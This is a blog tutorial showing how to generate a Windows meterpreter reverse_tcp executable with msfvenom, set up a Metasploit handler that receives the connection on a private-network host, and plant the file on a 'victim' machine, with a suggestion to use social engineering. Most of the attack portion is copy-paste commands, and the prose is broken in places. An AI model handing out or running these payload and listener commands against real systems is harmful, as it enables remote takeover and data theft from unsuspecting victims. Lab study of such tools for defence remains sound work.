Data-mining a compromised host

In this blog, we are going to take a file that can be .txt .doc .exe and we inject a payload to it, later we will verify which antivirus it detects, and finally, we will be able this file in the victim, and we will observe what happens.

what is a payload?

We can say that a payload is something harmful that is activated when executing any malware, in addition to raising privileges, it takes full advantage of the vulnerabilities found, in essence, the Payload is the part of the malicious code within the exploit, in charge of exploiting and exploiting this vulnerability to the maximum.

Installing tools in ubuntu and Debian

It does not emphasize the installation of Metasploit, but we will do a little review, so you know what it is about.

We open a Linux terminal and copies and paste the following command:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

The result of the command will be the following:

In case you have some error with the installation in this link https://www.metasploit.com/ you find the necessary documentation to perform the installation

To create a payload we have a lot of tools, a significant one is Metasploit; we will generate a payload to attack Windows 7.

msfvenom -a x86 –platform windows -p windows / meterpreter / reverse_tcp LHOST = 192.168.100.3 -b “\ x00” -f exe -o Meterpreter.exe

This is the file that we have created and that we will put on the victim machine.

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.100.3 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc

msfconsole -r meterpreter.rc

To put the payload on the victim’s machine, you can use social engineering or any other way. In this case, we will upload it with a meterpreter session to make it faster.

The following image shows the file on the Windows 7 machine.

This would be the result of the attack

Checking the victim’s network settings

This is another command with which we can do tests, this serves to show a list of files and directories.

A session of meterpreter as a shell of windows you have a large amount of commands that are very useful at the time of making an attack.

 

This post was written by Ruben Dario Caravajal Herrera

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.